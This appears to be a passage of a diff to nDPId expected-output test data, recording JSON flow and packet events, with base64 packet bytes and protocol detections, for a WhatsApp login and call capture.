01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1432582228504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":540,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":540,"pkt_l4_len":506,"thread_ts_msec":1432582228504,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIO1F9AAEAGq2HAqAIEEW7lDsApFGe4aFEm1IsaTIAYIACssAAAAQEICi36MxJvhmvfY2JtdD6CZ3s26zaizYDBa1\/xV9+nfluOxtxa1tx195Jafsz52yXEOESrPvfo4L8JAAp0DYIaansHyOlB83T10iMEgMWpntVaGhVYz7Ui4c09FkbWN9q+65\/aqUq4TUrgzMyqE5QUWhXZSc\/uGC0icKHu+b2FL4NHGUs7nYDs8Xc0v0flHk5486jecRIc\/ROiqHyACG3C0wwDLYD5dPHsc+oO3YTdMQHp\/Y5aWShkoF9bF0dA6YegCOYLbVQKFU7DAdWxqhRRjje8xXf+tC7iVD+agcMxzHZHBdPvzUlsa6Hnp2KvOrzs9LBI3\/AlWnTDSOZNp+mWgK4MB2zxE5cEBsbimybYF8snsRtPtIBkMUfF1XAd9wg4sSCboXV1ik63xPuzTMdOxIRWWE26PTSksHKRu47JqvdF18Y85LvvQvIIft9jAMxZNM1JpDNK3xHTwcbI8OJ5ZzkwaDArtx1Yo+du+Za4kNeW1j1f7jlL58\/xs\/9pH231BKAPZrpjtiVLnSRVafACBd5M5lgbO1u\/aSBlmIQ\/UK6DM\/jen1DGM+xWiz3ABAYXKSpL6XfsJZ+dpwtcFktAw18x3fF8GSC0\/zgV+SA55WfIkN+qTLtYiq6ct7jHTceCT8cS"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432582228753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228753,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JuMAAC8Gq7gRbuUOwKgCBBRnwCnUixpMuGhRJoAQAQ6R7QAAAQEICm+GjQ4t+jMS"} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582230648,"flow_last_seen":1432582230648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582230648,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1432582230648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582230648,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZppAAEAGvV7AqAIEEa1CZsA0AbuMr4Y\/AAAAALAC\/\/\/iDQAAAgQFtAEDAwQBAQgKLfo7WAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432582230787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582230787,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0jEsAAO8GKLkRrUJmwKgCBAG7wDR81DyUjK+GQIASH\/6qEgAAAgQFoAEDAwQBAQQC"} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1432582230854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582230854,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLotAAEAG9YXAqAIEEa1CZsA0AbuMr4ZAfNQ8lVAQQADKywAA"} -00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233314,"flow_last_seen":1432582233314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233314,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1432582233314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233314,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0kh5AAEAGATfAqAIEXbqHCMAoAFBgmxszxhyTY4ARIABAdgAAAQEICi36RbdjLQIx"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1432582233380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233380,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewoAADkGX0tduocIwKgCBABQwCjGHJNjYJsbNIAQAebnbwAAAQEICmMteVEt+kW3"} 
@@ -100,35 +100,35 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoODNAAEAGygnAqAIEEaxkO8AcAbueodpRe0gK3lAQ\/\/+2TwAA"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1432582238790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACarW0AAEARhl7AqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1432582238790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACat4MAAEARfEjAqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACayJAAAEARiRnAqAIEHw1GMMk+DZYAho7CAAMAaiESpEIAACUBlIyWX5N55xRAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaw2YAAEARjkPAqAIEHw1GMMk+DZYAho7CAAMAaiESpEIAACUBlIyWX5N55xRAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa2EoAAEARf1\/AqAIEHw1AMMk+DZYAhnzzAAMAaiESpEIAAN5oNK0Wc\/NrxVVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa9a4AAEARYfvAqAIEHw1AMMk+DZYAhnzzAAMAaiESpEIAAN5oNK0Wc\/NrxVVAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa8J4AAEARUgvAqAIEHw1VMMk+DZYAhiWBAAMAaiESpEIAADIU0Oi5cQTqY2RAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaLVIAAEARFVjAqAIEHw1VMMk+DZYAhiWBAAMAaiESpEIAADIU0Oi5cQTqY2RAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238791,"flow_last_seen":1432582238791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238791,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1432582238791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238791,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaNZEAAEARBxnAqAIEHw1bMMk+DZYAhs2+AAMAaiESpEIAAJhbSrigEVALo05AAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 